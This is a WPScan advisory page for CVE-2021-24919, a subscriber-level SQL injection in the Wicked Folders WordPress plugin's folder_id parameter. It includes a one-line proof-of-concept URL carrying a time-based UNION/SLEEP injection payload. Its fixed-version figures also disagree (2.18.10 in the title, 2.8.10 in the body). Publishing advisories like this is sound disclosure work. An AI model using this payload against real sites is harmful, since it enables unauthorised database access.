WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Wicked Folders < 2.18.10 - Subscriber+ SQL Injection

Description

The plugin does not sanitise and escape the folder_id parameter before using it in a SQL statement in the wicked_folders_save_sort_order AJAX action, available to any authenticated user. leading to an SQL injection

Proof of Concept

As a subscriber: https://example.com/wp-admin/admin-ajax.php?action=wicked_folders_save_sort_order&folder_id=-1%20UNION%20(SELECT%2042,42,42%20FROM%20(SELECT(SLEEP(5)))b)%20--

Affects Plugins

wicked-folders
Fixed in version 2.8.10

References

CVE
CVE-2021-24919
URL
https://plugins.trac.wordpress.org/changeset/2651221

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
f472ec7d-765c-4266-ab9c-e2d06703ebb4

Timeline

Publicly Published

2022-01-03 (about 1 years ago)

Added

2022-01-03 (about 1 years ago)

Last Updated

2022-04-12 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin